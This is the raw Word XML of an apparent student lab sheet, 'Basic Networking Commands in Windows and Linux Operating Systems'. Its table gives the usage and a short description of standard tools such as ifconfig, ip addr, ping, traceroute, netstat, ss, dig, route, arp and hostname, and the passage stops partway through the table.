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9DF0F" w14:textId="04ACB220" w:rsidR="00B55643" w:rsidRDefault="3C074FCE" w:rsidP="00C44ABF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>BASIC NETWORKING COMMANDS IN WINDOWS AND LINUX OPERATING SYSTEMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F074F" w14:textId="77777777" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643"/>
    <w:p w14:paraId="5F5A9929" w14:textId="341838C4" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643">
      <w:r w:rsidRPr="00074E6B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Ex.  No</w:t>
      </w:r>
      <w:r>
        <w:t>:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D001653" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00B55643"/>
    <w:p w14:paraId="26702B74" w14:textId="7EE9228B" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00B55643">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074E6B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Commands:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E49B" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00B5564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1816"/>
        <w:gridCol w:w="2308"/>
        <w:gridCol w:w="4448"/>
      </w:tblGrid>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="21FFB1CC" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17983496" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4526109F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60586B18" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Synopsis (Usage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B114E90" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="1AD808E8" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69549D86" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2C0348" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2986C6B0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> [interface]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32810636" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays or configures IP address, netmask, and MAC of a network interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="64D4557B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CDA641A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="113F1FA7" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DADF3DA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> show</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5570D626" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve">Shows or assigns IP addresses to interfaces (modern replacement for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="3E4259B8" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40E03C2E" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75718B25" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FF413DD" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ping &lt;hostname/IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71AABDDA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Sends ICMP packets to test connectivity and response time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="1BB13C88" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1278B5B3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BDF3CF0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>traceroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E31A3C4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>traceroute &lt;hostname/IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51649B93" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays the route packets take to reach a destination.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="77C06CF2" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796BF6FC" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DEF099F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1650FE24" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat -an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C327BB4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Shows active network connections, ports, and routing tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="4E7E0058" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2087D6" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7707E366" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04ABA4EA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ss -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tuln</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47E24501" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays open sockets and listening ports (faster replacement for netstat).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="602E2411" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E006A9" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776C614D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DDB3FF" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4EFC34" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Queries DNS to resolve domain names into IP addresses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="22803AF0" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652A7D76" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A1BF72D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>dig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DE654FD" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>dig &lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58572701" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Provides detailed DNS query info (advanced DNS lookup tool).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="62F9067F" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C61E068" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41EAB9BE" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E47E32" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>route -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CCA2BA4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays or modifies the kernel’s IP routing table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="27366275" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="067B20C3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CA49E86" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126251AD" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E408E7" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Shows or modifies the Address Resolution Protocol (ARP) table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="0D88FD23" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6BE27E" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01DCDA43" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10ADF1C4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C20B33C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays or sets the system’s hostname.</w:t>
            </w:r>
